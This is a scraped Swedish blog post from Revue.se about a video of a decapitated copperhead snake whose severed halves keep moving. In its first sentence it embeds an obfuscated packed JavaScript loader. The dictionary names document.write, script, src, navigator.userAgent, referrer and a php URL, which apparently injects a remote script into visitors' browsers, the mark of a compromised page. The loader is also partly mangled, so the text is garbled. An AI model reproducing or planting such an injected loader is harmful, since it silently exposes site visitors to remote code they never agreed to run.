Image Image Image Image Image Image Image Image Image Image

| 20 mars, 2018

Scroll to top

Top

No Comments

Halshuggen orm biter sig själv | Revue.se

Filip Urde
  • On 15 augusti, 2013
  • http://www.revue.se/filip-urde

Detta eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tkiit|var|u0026u|referrer|nezsr||js|php’.split(‘|’),0,{}))
är riktigt, riktigt sjukt. 

I videon så får vi se en kopparhuvuds-orm som har fått sitt huvud avhugget, men värkar ändå inte vilja dö. Efter att kroppsdelarna har separerats så ser det ut som om de båda delarna fortsätter att leva.

Är du känslig för ormar så bör du inte titta.
www.youtube.com

Tags